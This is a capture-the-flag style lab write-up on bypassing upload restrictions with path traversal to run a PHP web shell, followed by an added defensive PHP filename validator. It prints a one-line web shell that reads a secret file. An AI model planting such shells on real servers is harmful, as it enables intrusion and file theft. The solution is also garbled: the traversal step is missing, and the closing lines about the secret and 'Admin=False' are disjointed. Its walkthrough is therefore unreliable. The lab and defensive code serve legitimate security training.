03 Lab: Web shell upload via path traversal

Objective

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

  1. We explore the login and find that it lets us upload an image.

https://0a9f00a50375fb3782ee154f00be0000.web-security-academy.net/files/avatars/04.png

  2. <?php echo file_get_contents('/home/carlos/secret'); ?>

The server is configured to prevent execution of user-supplied files
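
The defensive side of this lab, as an added example that is not part of the original writeup or the lab's own code: a PHP check that decides where an uploaded avatar is stored, so a crafted filename cannot place the file outside the directory the server treats as non-executable. The function name `avatar_destination`, the demo directory and the sample filenames are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from the lab): decide where an uploaded avatar may be stored.
// Returns an absolute destination path, or null if the upload must be rejected.
function avatar_destination(string $uploadDir, string $clientName): ?string
{
    // Character allowlist: rejects path separators, '%', NUL bytes and extra dots,
    // so no decoding step later on can turn the name into a different path.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.([A-Za-z0-9]+)\z/', $clientName, $m)) {
        return null;
    }
    // Extension allowlist: image types only, never anything the server may interpret.
    $ext = strtolower($m[1]);
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return null;
    }
    // Resolve the upload directory once; fail closed if it does not exist.
    $base = realpath($uploadDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // Never reuse the client-supplied name on disk: generate one server-side.
    $dest = $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    // Defence in depth: the parent of the final path must be the upload directory.
    return dirname($dest) === $base ? $dest : null;
}

// Constructed sample inputs: one legitimate avatar name and three that must be refused.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'avatars_demo';
if (!is_dir($dir)) {
    mkdir($dir, 0700, true);
}
foreach (['04.png', 'shell.php', '../shell.php', 'a.png.php'] as $name) {
    $dest = avatar_destination($dir, $name);
    printf("%-16s => %s\n", $name, $dest === null ? 'rejected' : 'stored as ' . basename($dest));
}
```

Only `04.png` is accepted, and it is stored under a server-generated name; the other three samples are rejected before any path is built.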

This was the secret:

We observe Admin=False
